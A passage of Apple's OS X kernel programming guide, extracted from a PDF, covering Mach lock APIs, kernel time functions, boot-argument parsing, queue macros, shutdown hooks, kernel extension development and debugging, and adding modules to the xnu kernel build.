wait_result_tlck_mtx_sleep_deadline( lck_mtx_t *lck, lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible, uint64_t deadline); extern void lck_mtx_assert( lck_mtx_t *lck, unsigned int type); as described in . The arguments to these functions are described in detail in “Using Lock Functions” (page 139). Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 135Read-Write Locks Read-write locks (also called shared-exclusive locks) are somewhat different from traditional locks in that they are not always exclusive locks. A read-write lock is useful when shared data can be reasonably read concurrently by multiple threads except while a thread is modifying the data. Read-write locks can dramatically improve performance if the majority of operations on the shared data are in the form of reads(since it allows concurrency), while having negligible impact in the case of multiple writes. A read-write lock allows this sharing by enforcing the following constraints: ● Multiple readers can hold the lock at any time. ● Only one writer can hold the lock at any given time. ● A writer must block until all readers have released the lock before obtaining the lock for writing. ● Readers arriving while a writer is waiting to acquire the lock will block until after the writer has obtained and released the lock. The first constraint allows read sharing. The second constraint prevents write sharing. The third prevents read-write sharing, and the fourth prevents starvation of the writer by a steady stream of incoming readers. Mach read-write locks also provide the ability for a reader to become a writer and vice-versa. In locking terminology, an upgrade is when a reader becomes a writer, and a downgrade is when a writer becomes a reader. To prevent deadlock, some additional constraints must be added for upgrades and downgrades: ● Upgrades are favored over writers. ● The second and subsequent concurrent upgrades will fail, causing that thread’s read lock to be released. The first constraint is necessary because the reader requesting an upgrade is holding a read lock, and the writer would not be able to obtain a write lock until the reader releases its read lock. In this case, the reader and writer would wait for each other forever. The second constraint is necessary to prevents the deadlock that would occur if two readers wait for the other to release its read lock so that an upgrade can occur. The functions that operate on read-write locks are: extern lck_rw_t *lck_rw_alloc_init( lck_grp_t *grp, lck_attr_t *attr); extern void lck_rw_init( lck_rw_t *lck, lck_grp_t *grp, Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 136lck_attr_t *attr); extern void lck_rw_lock( lck_rw_t *lck, lck_rw_type_t lck_rw_type); extern void lck_rw_unlock( lck_rw_t *lck, lck_rw_type_t lck_rw_type); extern void lck_rw_lock_shared( lck_rw_t *lck); extern void lck_rw_unlock_shared( lck_rw_t *lck); extern void lck_rw_lock_exclusive( lck_rw_t *lck); extern void lck_rw_unlock_exclusive( lck_rw_t *lck); extern void lck_rw_destroy( lck_rw_t *lck, lck_grp_t *grp); extern void lck_rw_free( lck_rw_t *lck, lck_grp_t *grp); extern wait_result_t lck_rw_sleep( lck_rw_t *lck, lck_sleep_action_t lck_sleep_action, Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 137event_t event, wait_interrupt_t interruptible); extern wait_result_t lck_rw_sleep_deadline( lck_rw_t *lck, lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible, uint64_t deadline); This is a more complex interface than that of the other locking mechanisms, and actually is the interface upon which the other locks are built. The functions lck_rw_lock and lck_rw_lock lock and unlock a lock as either shared (read) or exclusive (write), depending on the value of lck_rw_type., which can contain either LCK_RW_TYPE_SHARED or LCK_RW_TYPE_EXCLUSIVE. You should always be careful when using these functions, as unlocking a lock held in shared mode using an exclusive call or vice-versa will lead to undefined results. The arguments to these functions are described in detail in “Using Lock Functions” (page 139). Spin/Sleep Locks Spin/sleep locks are not implemented in the OS X kernel. However, they can be easily implemented on top of existing locks if desired. For short waits on multiprocessor systems, the amount of time spent in the context switch can be greater than the amount of time spent spinning. When the time spent spinning while waiting for the lock becomes greater than the context switch overhead, however, mutexes become more efficient. For this reason, if there is a large degree of variation in wait time on a highly contended lock, spin/sleep locks may be more efficient than traditional spinlocks or mutexes. Ideally, a program should be written in such a way that the time spent holding a lock is always about the same, and the choice of locking is clear. However, in some cases, this is not practical for a highly contended lock. In those cases, you may consider using spin/sleep locks. Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 138The basic principle ofspin/sleep locksissimple. A thread takesthe lock if it is available. If the lock is not available, the thread may enter a spin cycle. After a certain period of time (usually a fraction of a time quantum or a small number of time quanta), the spin routine’s time-out is reached, and it returns failure. At that point, the lock places the waiting thread on a queue and puts it to sleep. In other variations on this design, spin/sleep locks determine whether to spin or sleep according to whether the lock-holding thread is currently on another processor (or is about to be). For short wait periods on multiprocessor computers, the spin/sleep lock is more efficient than a mutex, and roughly as efficient as a standard spinlock. For longer wait periods, the spin/sleep lock is significantly more efficient than the spinlock and only slightly less efficient than a mutex. There is a period near the transition between spinning and sleeping in which the spin/sleep lock may behave significantly worse than either of the basic lock types, however. Thus, spin/sleep locks should not be used unless a lock is heavily contended and has widely varying hold times. When possible, you should rewrite the code to avoid such designs. Using Lock Functions While most of the locking functions are straightforward, there are a few detailsrelated to allocating, deallocating, and sleeping on locks that require additional explanation. As the syntax of these functions is identical across all of the lock types, this section explains only the usage for spinlocks. Extending this to other lock types is left as a (trivial) exercise for the reader. The first thing you must do when allocating locks is to allocate a lock group and a lock attribute set. Lock groups are used to name locks for debugging purposes and to group locks by function for general understandability. Lock attribute sets allow you to set flags that alter the behavior of a lock. The following code illustrates how to allocate an attribute structure and a lock group structure for a lock. In this case, a spinlock is used, but with the exception of the lock allocation itself, the process is the same for other lock types. Listing 17-1 Allocating lock attributes and groups (lifted liberally from kern_time.c) lck_grp_attr_t *tz_slock_grp_attr; lck_grp_t *tz_slock_grp; lck_attr_t *tz_slock_attr; lck_spin_t *tz_slock; /* allocate lock group attribute and group */ tz_slock_grp_attr = lck_grp_attr_alloc_init(); lck_grp_attr_setstat(tz_slock_grp_attr); Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 139tz_slock_grp = lck_grp_alloc_init("tzlock", tz_slock_grp_attr); /* Allocate lock attribute */ tz_slock_attr = lck_attr_alloc_init(); //lck_attr_setdebug(tz_slock_attr); // set the debug flag //lck_attr_setdefault(tz_slock_attr); // clear the debug flag /* Allocate the spin lock */ tz_slock = lck_spin_alloc_init(tz_slock_grp, tz_slock_attr); The first argument to the lock initializer, of type lck_grp_t, is a lock group. This is used for debugging purposes, including lock contention profiling. The details of lock tracing are beyond the scope of this document, however, every lock must belong to a group (even if that group contains only one lock). The second argument to the lock initializer, of type lck_attr_t, contains attributes for the lock. Currently, the only attribute available islock debugging. This attribute can be set using lck_attr_setdebug and cleared with lck_attr_setdefault. To dispose of a lock, you simply call the matching free functions. For example: lck_spin_free(tz_slock, tz_slock_grp); lck_attr_free(tz_slock_attr); lck_grp_free(tz_slock_grp); lck_grp_attr_free(tz_slock_grp_attr); Note: While you can safely dispose of the lock attribute and lock group attribute structures, it is important to keep track of the lock group associated with a lock as long as the lock exists, since you will need to pass the group to the lock's matching free function when you deallocate the lock (generally at unload time). The other two interesting functions are lck_spin_sleep and lck_spin_sleep_deadline. These functions release a spinlock and sleep until an event occurs, then wake. The latter includes a timeout, at which point it will wake even if the event has not occurred. extern wait_result_t lck_spin_sleep( lck_rspin_t *lck, Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 140lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible); extern wait_result_t lck_spin_sleep_deadline( lck_spin_t *lck, lck_sleep_action_t lck_sleep_action, event_t event, wait_interrupt_t interruptible, uint64_t deadline); The parameter lck_sleep_action controls whether the lock will be reclaimed after sleeping prior to this function returning. The valid options are: LCK_SLEEP_DEFAULT Release the lock while waiting for the event, then reclaim it. Read-write locks are held in the same mode as they were originally held. LCK_SLEEP_UNLOCK Release the lock and return with the lock unheld. LCK_SLEEP_SHARED Reclaim the lock in shared mode (read-write locks only). LCK_SLEEP_EXCLUSIVE Reclaim the lock in exclusive mode (read-write locks only). The event parameter can be any arbitrary integer, but it must be unique across the system. To ensure uniqueness, a common programming practice isto use the address of a global variable (often the one containing a lock) as the event value. For more information on these events, see “Event and Timer Waits” (page 143). The parameter interruptible indicates whether the scheduler should allow the wait to be interrupted by asynchronous signals. If this is false, any false wakes will result in the process going immediately back to sleep (with the exception of a timer expiration signal, which will still wake lck_spin_sleep_deadline). Synchronization Primitives Locks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 141This chapter containsinformation about miscellaneousservices provided by the OS X kernel. For most projects, you will probably never need to use most of these services, but if you do, you will find it hard to do without them. This chapter containsthese sections:“Using Kernel Time Abstractions” (page 142),“Boot Option Handling” (page 146), “Queues” (page 147), and “Installing Shutdown Hooks” (page 148). Using Kernel Time Abstractions There are two basic groups of time abstractionsin the kernel. One group includesfunctionsthat provide delays and timed wake-ups. The other group includesfunctions and variablesthat provide the current wall clock time, the time used by a given process, and other similar information. This section describes both aspects of time from the perspective of the kernel. Obtaining Time Information There are a number of ways to get basic time information from within the kernel. The officially approved methods are those that Mach exports in kern/clock.h. These include the following: void clock_get_uptime(uint64_t *result); void clock_get_system_microtime( uint32_t *secs, uint32_t *microsecs); void clock_get_system_nanotime( uint32_t *secs, uint32_t *nanosecs); void clock_get_calendar_microtime( uint32_t *secs, uint32_t *microsecs); void clock_get_calendar_nanotime( uint32_t *secs, uint32_t *nanosecs); 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 142 Miscellaneous Kernel ServicesThe function clock_get_uptime returns a value in AbsoluteTime units. For more information on using AbsoluteTime, see “Using Mach Absolute Time Functions” (page 144). The functions clock_get_system_microtime and clock_get_system_nanotime return 32-bit integers containing seconds and microseconds or nanoseconds, respectively, representing the system uptime. The functions clock_get_calendar_microtime and clock_get_calendar_nanotime return 32-bit integers containing seconds and microseconds or nanoseconds, respectively, representing the current calendar date and time since the epoch (January 1, 1970). In some parts of the kernel, you may find other functions that return type mach_timespec_t. This type is similar to the traditional BSD struct timespec, except that fractions of a second are measured in nanoseconds instead of microseconds: struct mach_timespec { unsigned int tv_sec; clock_res_t tv_nsec; }; typedef struct mach_timespec *mach_timespec_t; In addition to the traditional Mach functions, if you are writing code in BSD portions of the kernel you can also get the current calendar (wall clock) time as a BSD timeval, as well as find out the calendar time when the system was booted by doing the following: #include struct timeval tv=time; /* calendar time */ struct timeval tv_boot=boottime; /* calendar time when booting occurred */ For other information, you should use the Mach functions listed previously. Event and Timer Waits Each part of the OS X kernel has a distinct API for waiting a certain period of time. In most cases, you can call these functions from other parts of the kernel. The I/O Kit provides IODelay and IOSleep. Mach provides functions based on AbsoluteTime, as well as a few based on microseconds. BSD provides msleep. Miscellaneous Kernel Services Using Kernel Time Abstractions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 143Using IODelay and IOSleep IODelay, provided by the I/O Kit, abstracts a timed spin. If you are delaying for a short period of time, and if you need to be guaranteed that your wait will not be stopped prematurely by delivery of asynchronous events, this is probably the best choice. If you need to delay for several seconds, however, this is a bad choice, because the CPU that executes the wait will spin until the time has elapsed, unable to handle any other processing. IOSleep puts the currently executing thread to sleep for a certain period of time. There is no guarantee that your thread will execute after that period of time, nor isthere a guarantee that your thread will not be awakened by some other event before the time has expired. It is roughly equivalent to the sleep call from user space in this regard. The use of IODelay and IOSleep are straightforward. Their prototypes are: IODelay(unsigned microseconds); IOSleep(unsigned milliseconds); Note the differing units. It is not practical to put a thread to sleep for periods measured in microseconds, and spinning for several milliseconds is also inappropriate. Using Mach Absolute Time Functions The following Mach time functions are commonly used. Several others are described in osfmk/kern/clock.h. Note: These are not the same functions as those listed in kern/clock.h in the Kernel framework. These functions are not exposed to kernel extensions, and are only for use within the kernel itself. void delay(uint64_t microseconds); void clock_delay_until(uint64_t deadline); void clock_absolutetime_interval_to_deadline(uint64_t abstime, uint64_t *result); void nanoseconds_to_absolutetime(uint64_t nanoseconds, uint64_t *result); void absolutetime_to_nanoseconds(uint64_t abstime, uint64_t *result); These functions are generally straightforward. However, a few points deserve explanation. Unless specifically stated, all times, deadlines, and so on, are measured in abstime units. The abstime unit is equal to the length of one bus cycle,so the duration is dependent on the busspeed of the computer. For thisreason, Mach provides conversion routines between abstime units and nanoseconds. Miscellaneous Kernel Services Using Kernel Time Abstractions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 144Many time functions, however, provide time in seconds with nanosecond remainder. In this case, some conversion is necessary. For example, to obtain the current time as a mach abstime value, you might do the following: uint32_t secpart; uint32_t nsecpart; uint64_t nsec, abstime; clock_get_calendar_nanotime(&secpart, &nsecpart); nsec = nsecpart + (1000000000ULL * secpart); //convert seconds to nanoseconds. nanoseconds_to_absolutetime(nsec, &abstime); The abstime value is now stored in the variable abstime. Using msleep In addition to Mach and I/O Kit routines, BSD provides msleep, which is the recommended way to delay in the BSD portions of the kernel. In other parts of the kernel, you should either use wait_queue functions or use assert_wait and thread_wakeup functions, both of which are closely tied to the Mach scheduler, and are described in “Kernel Thread APIs” (page 85). Because this function is more commonly used for waiting on events, it is described further in “Condition Variables” (page 130). Handling Version Dependencies Many time-related functions such as clock_get_uptime changed as a result of the transition to KPIs in OS X v.10.4. While these changes result in a cleaner interface, this can prove challenging if you need to make a kernel extension that needs to obtain time information across multiple versions of OS X in a kernel extension that would otherwise have no version dependencies (such as an I/O Kit KEXT). Here is a list of time-related functions that are available in both pre-KPI and KPI versions of OS X: uint64_t mach_absolute_time(void); Declared In: Dependency: com.apple.kernel.mach This function returns a Mach absolute time value for the current wall clock time in units of uint64_t. Miscellaneous Kernel Services Using Kernel Time Abstractions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 145void microtime(struct timeval *tv); Declared In: Dependency: com.apple.kernel.bsd This function returns a timeval struct containing the current wall clock time. void microuptime(struct timeval *tv); Declared In: Dependency: com.apple.kernel.bsd This function returns a timeval struct containing the current uptime. void nanotime(struct timespec *ts); Declared In: Dependency: com.apple.kernel.bsd This function returns a timespec struct containing the current wall clock time. void nanouptime(struct timespec *ts); Declared In: Dependency: com.apple.kernel.bsd This function returns a timespec struct containing the current uptime. Note: The structure declarationsfor struct timeval and struct timespec differ between 10.3 and 10.4 in their use of int, int32_t, and long data types. However, because the structure packing for the underlying data types is identical in the 32-bit world, these structures are assignment compatible. In addition to these APIs, the functionality marked __APPLE_API_UNSTABLE in was adopted as-is in OS X v.10.4 and is no longer marked unstable. Boot Option Handling OS X provides a simple parse routine, PE_parse_boot_arg, for basic boot argument passing. It supports both flags and numerical value assignment. For obtaining values, you write code similar to the following: unsigned int argval; if (PE_parse_boot_arg("argflag", &argval)) { Miscellaneous Kernel Services Boot Option Handling 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 146/* check for reasonable value */ if (argval < 10 || argval > 37) argval = 37; } else { /* use default value */ argval = 37; } Since PE_parse_boot_arg returns a nonzero value if the flag exists, you can check for the presence of a flag by using a flag that starts with a dash (-) and ignoring the value stored in argvalue. The PE_parse_boot_arg function can also be used to get a string argument. To do this, you must pass in the address of an array of type char as the second argument. The behavior of PE_parse_boot_arg is undefined if a string is passed in for a numeric variable or vice versa. Its behavior is also undefined if a string exceeds the storage space allocated. Be sure to allow enough space for the largest reasonable string including a null delimiter. No attempt is made at bounds checking, since an overflow is generally a fatal error and should reasonably prevent booting. Queues As part of its BSD infrastructure, the OS X kernel provides a number of basic support macrosto simplify handling of linked lists and queues. These are implemented as C macros, and assume a standard C struct. As such, they are probably not suited for writing code in C++. The basic types of lists and queues included are ● SLIST, a singly linked list ● STAILQ, a singly linked tail queue ● LIST, a doubly linked list ● TAILQ, a doubly linked tail queue SLIST is ideal for creating stacks or for handling large sets of data with few or no removals. Arbitrary removal, however, requires an O(n) traversal of the list. STAILQ is similar to SLIST except that it maintains pointers to both ends of the queue. This makes it ideal for simple FIFO queues by adding entries at the tail and fetching entries from the head. Like SLIST, it is inefficient to remove arbitrary elements. Miscellaneous Kernel Services Queues 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 147LIST is a doubly linked version of SLIST. The extra pointersrequire additionalspace, but allow O(1) (constant time) removal of arbitrary elements and bidirectional traversal. TAILQ is a doubly linked version of STAILQ. Like LIST, the extra pointers require additional space, but allow O(1) (constant time) removal of arbitrary elements and bidirectional traversal. Because their functionality is relatively simple, their use is equally straightforward. These macros can be found in xnu/bsd/sys/queue.h. Installing Shutdown Hooks Although OS X does not have traditional BSD-style shutdown hooks, the I/O Kit provides equivalent functionality in recent versions. Since the I/O Kit provides this functionality, you must call it from C++ code. To register for notification, you call registerSleepWakeInterest (described in IOKit/RootDomain.h) and register for sleep notification. If the system is about to be shut down, your handler is called with the message type kIOMessageSystemWillPowerOff. If the system is about to reboot, your handler gets the message type kIOMessageSystemWillRestart. If the system is about to reboot, your handler gets the message type kIOMessageSystemWillSleep. If you no longer need to receive notification (for example, if your KEXT gets unloaded), be certain to release the notifier with IONofitier::release to avoid a kernel panic on shutdown. For example, the following sample KEXT registersforsleep notifications, then logs a message with IOLog when a sleep notification occurs: #include #include #include #include #include #define ALLOW_SLEEP 1 IONotifier *notifier; extern "C" { Miscellaneous Kernel Services Installing Shutdown Hooks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 148IOReturn mySleepHandler( void * target, void * refCon, UInt32 messageType, IOService * provider, void * messageArgument, vm_size_t argSize ) { IOLog("Got sleep/wake notice. Message type was %d\n", messageType); #if ALLOW_SLEEP acknowledgeSleepWakeNotification(refCon); #else vetoSleepWakeNotification(refCon); #endif return 0; } kern_return_t sleepkext_start (kmod_info_t * ki, void * d) { void *myself = NULL; // Would pass the self pointer here if in a class instance notifier = registerPrioritySleepWakeInterest( &mySleepHandler, myself, NULL); return KERN_SUCCESS; } kern_return_t sleepkext_stop (kmod_info_t * ki, void * d) { notifier->remove(); return KERN_SUCCESS; } } // extern "C" Miscellaneous Kernel Services Installing Shutdown Hooks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 149As discussed in the chapter “Kernel Architecture Overview” (page 14), OS X provides a kernel extension mechanism as a means of allowing dynamic loading of code into the kernel, without the need to recompile or relink. Because these kernel extensions (KEXTs) provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to internal kernel interfaces. Because KEXTs run in supervisor mode in the kernel’s address space, they are also harder to write and debug than user-level modules, and must conform to strict guidelines. Further, kernel resources are wired (permanently resident in memory) and are thus more costly to use than resources in a user-space task of equivalent functionality. In addition, although memory protection keeps applications from crashing the system, no such safeguards are in place inside the kernel. A badly behaved kernel extension in OS X can cause as much trouble as a badly behaved application or extension could in Mac OS 9. Bugs in KEXTs can have far more severe consequences than bugs in user-level code. For example, a memory access error in a user application can, at worst, cause that application to crash. In contrast, a memory access error in a KEXT causes a kernel panic, crashing the operating system. Finally, for security reasons, some customers restrict or don’t permit the use of third-party KEXTs. As a result, use of KEXTs is strongly discouraged in situations where user-level solutions are feasible. OS X guarantees that threading in applications is just as efficient as threading inside the kernel, so efficiency should not be an issue. Unless your application requireslow-level accessto kernel interfaces, you should use a higher level of abstraction when developing code for OS X. When you are trying to determine if a piece of code should be a KEXT, the default answer is generally no . Even if your code was a system extension in Mac OS 9, that does not necessarily mean that it should be a kernel extension in OS X. There are only a few good reasons for a developer to write a kernel extension: ● Your code needsto take a primary interrupt—that is,something in the (built-in) hardware needsto interrupt the CPU and execute a handler. ● The primary client of your code is inside the kernel—for example, a block device whose primary client is a file system. ● Your code needs to access kernel interfaces that are not exported to user space. ● Your code has other special requirements that cannot be satisfied in a user space application. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 150 Kernel Extension OverviewIf your code does not meet any of the above criteria (and possibly even if it does), you should consider developing it as a library or a user-level daemon, or using one of the user-level plug-in architectures (such as QuickTime components or the Core Graphics framework) instead of writing a kernel extension. If you are writing device drivers or code to support a new volume format or networking protocol, however, KEXTs may be the only feasible solution. Fortunately, while KEXTs may be more difficult to write than user-space code, several tools and procedures are available to enhance the development and debugging process. See “Debugging Your KEXT” (page 153) for more information. This chapter provides a conceptual overview of KEXTs and how to create them. If you are interested in building a simple KEXT, see the Apple tutorials listed in the bibliography. These provide step-by-step instructions for creating a simple, generic KEXT or a basic I/O Kit driver. Implementation of a Kernel Extension (KEXT) Kernel extensions are implemented as bundles, folders that the Finder treats as single files. See the chapter about bundles in Mac Technology Overview for a discussion of bundles.The KEXT bundle can contain the following: ● Information property list—a text file that describes the contents, settings, and requirements of the KEXT. This file is required. A KEXT bundle need contain nothing more than this file, although most KEXTs contain one or more kernel modules as well. See the chapter about software configuration in Mac Technology Overview for further information about property lists. ● KEXT binary—a file in Mach-O format, containing the actual binary code used by the KEXT. A KEXT binary (also known as a kernel module or KMOD) represents the minimum unit of code that can be loaded into the kernel. A KEXT usually contains one KEXT binary. If no KEXT binaries are included, the information property list file must contain a reference to another KEXT and change its default settings. ● Resources—for example, icons or localization dictionaries. Resources are optional; they may be useful for a KEXT that needs to display a dialog or menu. At present, no resources are explicitly defined for use with KEXTs. ● KEXT bundles—a kext can contain other KEXTs. This can be used for plug-ins that augment features of a KEXT. Kernel Extension Dependencies Any KEXT can declare that it is dependent upon any other KEXT. The developer lists these dependencies in the OSBundleLibraries dictionary in the module’s property list file. Kernel Extension Overview Implementation of a Kernel Extension (KEXT) 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 151Before a KEXT isloaded, all of itsrequirements are checked. Those required extensions(and their requirements) are loaded first, iterating back through the lists until there are no more required extensions to load. Only after all requirements are met, is the requested KEXT loaded as well. For example, device drivers (a type of KEXT) are dependent upon (require) certain families (another type of KEXT). When a driver isloaded, itsrequired families are also loaded to provide necessary, common functionality. To ensure that all requirements are met, each device drivershould list all of itsrequirements(families and other drivers) in its property list. See the chapter “I/O Kit Overview” (page 94), for an explanation of drivers and families. It is important to list all dependencies for each KEXT. If your KEXT fails to do so, your KEXT may not load due to unrecognized symbols, thusrendering the KEXT useless. Dependenciesin KEXTs can be considered analogous to required header files or librariesin code development; in fact, the Kernel Extension Manager usesthe standard linker to resolve KEXT requirements. Building and Testing Your Extension After creating the necessary property list and C or C++ source files, you use Project Builder to build your KEXT. Any errors in the source code are brought to your attention during the build and you are given the chance to edit your source files and try again. To test your KEXT, however, you need to leave Project Builder and work in the Terminal application (or in console mode). In console mode, all system messages are written directly to your screen, as well as to a log file (/var/log/system.log). If you work in the Terminal application, you must view system messages in the log file or in the Console application.You also need to log in to the root account (or use the su or sudo command), since only the root account can load kernel extensions. When testing your KEXT, you can load and unload it manually, as well as check the load status. You can use the kextload command to load any KEXT. A manual page for kextload is included in OS X. (On OS X prior to 10.2, you must use the kmodload command instead.) Note that this command is useful only when developing a KEXT. Eventually, after it has been tested and debugged, you install your KEXT in one of the standard places (see “Installed KEXTs” (page 154) for details). Then, it will be loaded and unloaded automatically at system startup and shutdown or whenever it is needed (such as when a new device is detected). Kernel Extension Overview Building and Testing Your Extension 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 152Debugging Your KEXT KEXT debugging can be complicated. Before you can debug a KEXT, you must first enable kernel debugging, as OS X is not normally configured to permit debugging the kernel. Only the root account can enable kernel debugging, and you need to reboot OS X for the changes to take effect. (You can use sudo to gain root privileges if you don’t want to enable a root password.) Kernel debugging is performed using two OS X computers, called the development or debug host and the debug target. These computers must be connected over a reliable network connection on the same subnet (or within a single local network). Specifically, there must not be any intervening IP routers or other devices that could make hardware-based Ethernet addressing impossible. The KEXT is registered (and loaded and run) on the target. The debugger is launched and run on the debug host. You can also rebuild your KEXT on the debug host, after you fix any errors you find. Debugging must be performed in this fashion because you must temporarily halt the kernel on the target in order to use the debugger. When you halt the kernel, all other processes on that computer stop. However, a debugger running remotely can continue to run and can continue to examine (or modify) the kernel on the target. Note that bugs in KEXTs may cause the target kernel to freeze or panic. If this happens, you may not be able to continue debugging, even over a remote connection; you have to reboot the target and start over, setting a breakpoint just before the code where the KEXT crashed and working very carefully up to the crash point. Developers generally debug KEXTs using gdb, a source-level debugger with a command-line interface. You will need to work in the Terminal application to run gdb. For detailed information about using gdb, see the documentation included with OS X. You can also use the help command from within gdb. Some features of gdb are unavailable when debugging KEXTs because of implementation limitations. For example: ● You can’t use gdb to call a function or method in a KEXT. ● You should not use gdb to debug interrupt routines. The former is largely a barrier introduced by the C++ language. The latter may work in some cases but is not recommended due to the potential for gdb to interrupt something upon which kdp (the kernel shim used by gdb) depends in order to function properly. Use care that you do not halt the kernel for too long when you are debugging (for example, when you set breakpoints). In a short time, internal inconsistencies can appear that cause the target kernel to panic or freeze, forcing you to reboot the target. Kernel Extension Overview Debugging Your KEXT 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 153Additional information about debugging can be found in “When Things Go Wrong: Debugging the Kernel” (page 161). Installed KEXTs The Kernel Extension Manager (KEXT Manager) is responsible for loading and unloading all installed KEXTs (commands such as kextload are used only during development). Installed KEXTs are dynamically added to the running OS X kernel as part of the kernel’s address space. An installed and enabled KEXT is invoked as needed. Important: Note that KEXTs are only wrappers(bundles) around a property list, KEXT binaries(or references to other KEXTs), and optional resources. The KEXT describes what is to be loaded; it is the KEXT binaries that are actually loaded. KEXTs are usually installed in the folder /System/Libraries/Extensions. The Kernel Extension Manager (in the form of a daemon, kextd), always checks here. KEXTs can also be installed in ROM or inside an application bundle. Installing KEXTs in an application bundle allows an application to register those KEXTs without the need to install them permanently elsewhere within the system hierarchy. This may be more convenient and allows the KEXT to be associated with a specific, running application. When it starts, the application can register the KEXT and, if desired, unregister it on exit. For example, a network packet sniffer application might employ a Network Kernel Extension (NKE). A tape backup application would require that a tape driver be loaded during the duration of the backup process. When the application exits, the kernel extension is no longer needed and can be unloaded. Note that, although the application is responsible for registering the KEXT, this is no guarantee that the corresponding KEXTs are actually ever loaded. It is still up to a kernel component, such as the I/O Kit, to determine a need, such as matching a piece of hardware to a desired driver, thus causing the appropriate KEXTs (and their dependencies) to be loaded. Kernel Extension Overview Installed KEXTs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 154This chapter is not about building kernel extensions (KEXTs). There are a number of good KEXT tutorials on Apple’s developer documentation site (http://developer.apple.com/documentation). This chapter is about adding new in-kernel modules(optional parts of the kernel), building kernels, and debugging kernel and kernel extension builds. The discussion is divided into three sections. The first, “Adding New Files or Modules” (page 155), describes how to add new functionality into the kernel itself. You should only add files into the kernel when the use of a KEXT is not possible (for example, when adding certain low-level motherboard hardware support). The second section, “Building Your First Kernel” (page 158), describes how to build a kernel, including how to build a kernel with debugger support, how to add new options, and how to obtain sources that are of similar vintage to those in a particular version of OS X or Darwin. The third section, “When Things Go Wrong: Debugging the Kernel” (page 161), tells how to debug a kernel or kernel module using ddb and gdb. This is a must-read for anyone doing kernel development. Adding New Files or Modules In this context, the term module is used loosely to refer to a collection of related files in the kernel that are controlled by a single config option at compile time. It does not refer to loadable modules (KEXTs). This section describes how to add additional files that will be compiled into the kernel, including how to add a new config option for an additional module. Modifying the Configuration Files The details of adding a new file or module into the kernel differ according to what portion of the kernel contains the file. If you are adding a new file or module into the Mach portion of the kernel, you need to list it in various filesin xnu/osfmk/conf. For the BSD portion of the kernel, you should list it in variousfilesin xnu/bsd/conf. In either case, the procedure is basically the same, just in a different directory. This section is divided into two subsections. The first describes adding the module itself and the second describes enabling the module. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 155 Building and Debugging KernelsAdding the Files or Modules In the appropriate conf directory, you need to add your files or modules into various files. The files MASTER, MASTER.ppc, and MASTER.i386 contain the list of configuration options that should be built into the kernel for all architectures, PowerPC, and i386, respectively. These are supplemented by files, files.ppc, and files.i386, which contain associations between compile options and the files that are related to them for their respective architectures. The format for these two files is relatively straightforward. If you are adding a new module, you should first choose a name for that module. For example, if your module is called mach_foo, you should then add a new option line near the top of files that is whitespace (space or tab) delimited and looks like this: OPTIONS/mach_foo optional mach_foo The first part defines the name of the module as it will be used in #if statements in the code. (See “Modifying the Source Code Files” (page 157) for more information.) The second part is alwaysthe word optional. The third part tells the name of the option as used to turn it on or off in a MASTER file. Any line with mach_foo in the last field will be enabled only if there is an appropriate line in a MASTER file. Then, later in the file, you add osfmk/foo/foo_main.c optional mach_foo osfmk/foo/foo_bar.c optional mach_foo and so on, for each new file associated with that module. This also applies if you are adding a file to an existing module. If you are adding a file that is not associated with any module at all, you add a line that looks like the following to specify that this file should always be included: osfmk/crud/mandatory_file.c standard If you are not adding any modules, then you’re done. Otherwise, you also need to enable your option in one of the MASTER files. Enabling Module Options To enable a module option (as described in the files files), you must add an entry for that option into one of the MASTER files. If your code is not a BSD pseudo-device, you should add something like the following: options MACH_FOO Building and Debugging Kernels Adding New Files or Modules 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 156Otherwise, you should add something like this: pseudo-device mach_foo In the case of a pseudo-device (for example, /dev/random), you can also add a number. When your code checks to see if it should be included, it can also check that number and allocate resources for more than one pseudo-device. The meaning of multiple pseudo-devicesis device-dependent. An example of thisis ppp, which allocates resources for two simultaneous PPP connections. Thus, in the MASTER.ppc file, it has the line: pseudo-device ppp 2 Modifying the Source Code Files In the OS X kernel, all source code files are automatically compiled. It is the responsibility of the C file itself to determine whether its contents need to be included in the build or not. In the example above, you created a module called mach_foo. Assume that you want this file to compile only on PowerPC-based computers. In that case, you should have included the option only in MASTER.ppc and not in MASTER.i386. However, by default, merely specifying the file foo_main.c in files causes it to be compiled, regardless of compile options specified. To make the code compile only when the option mach_foo is included in the configuration, you should begin each C source file with the lines #include #if (MACH_FOO > 0) and end it with #endif /* MACH_FOO */ If mach_foo is a pseudo-device and you need to check the number of mach_foo pseudo-devices included, you can do further tests of the value of MACH_FOO. Note that the file is not something you create. It is created by the makefiles themselves. You must run make exporthdrs before make all to generate these files. Building and Debugging Kernels Adding New Files or Modules 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 157Building Your First Kernel Before you can build a kernel, you must first obtain source code. Source code for the OS X kernel can be found in the Darwin xnu project on 